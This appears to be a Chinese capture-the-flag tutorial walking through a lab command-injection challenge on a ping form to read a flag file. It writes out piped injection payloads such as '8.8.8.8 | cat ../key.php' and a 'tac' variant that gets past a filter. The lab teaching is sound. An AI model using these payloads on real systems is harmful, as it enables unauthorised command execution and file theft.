题目4 命令执行(保姆级教程)

url:http://192.168.154.253:84/ #打开http://XXX:81/,XXX为靶机的ip地址

审题

1、打开题目看到有一个提示,此题目需要通过利用命令执行漏洞执行Linux命令获取webshell,最后从根目录下key.php文件中获得flag

2、开始答题

第一步:测试命令执行漏洞点

|---------------------------------------------------------------------------------------------------------------|
| 1、传参 8.8.8.8 |
| |

第二步:利用漏洞点拿到flag

|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 猜测是执行了命令 ping 8.8.8.8 直接构建payload:ping 8.8.8.8 | ls 传参: 8.8.8.8 | ls |
| 应该是过滤了一些命令,换命令执行 执行语句: ping 8.8.8.8 | cat ../key.php 参数: 8.8.8.8 | cat ../key.php |
| 执行语句: ping 8.8.8.8 | tac ../key.php 参数: 8.8.8.8 | tac ../key.php |

相关推荐
小张不嚣张꒰ঌ(˚ᆺ˚)໒꒱2 小时前
Centos7在yum当中遇到Could not resolve host: mirrorlist.centos.org解决方案
linux·运维·服务器·centos
Sally璐璐2 小时前
CentOS企业级文件服务器终极部署指南
linux·服务器·centos
岁月玲珑2 小时前
【如何判断Linux系统是Ubuntu还是CentOS】
linux·ubuntu·centos
梅孔立2 小时前
yum update 报错 Cannot find a valid baseurl for repo: centos-sclo-rh/x86_64 等解决办法
linux·python·centos
Sca_杰2 小时前
centos指令
linux·运维·centos
几道之旅2 小时前
centos 7 安装NVIDIA Container Toolkit
linux·运维·centos
happyhappy没有句号2 小时前
CentOS系统如何安装和使用docker
docker·centos
BenSmith3 小时前
CVE-2025-6554漏洞复现
安全
BenSmith3 小时前
CVE-2018-17463复现
安全
lsec3 小时前
内存加载带有TLS的DLL的问题分析
windows·安全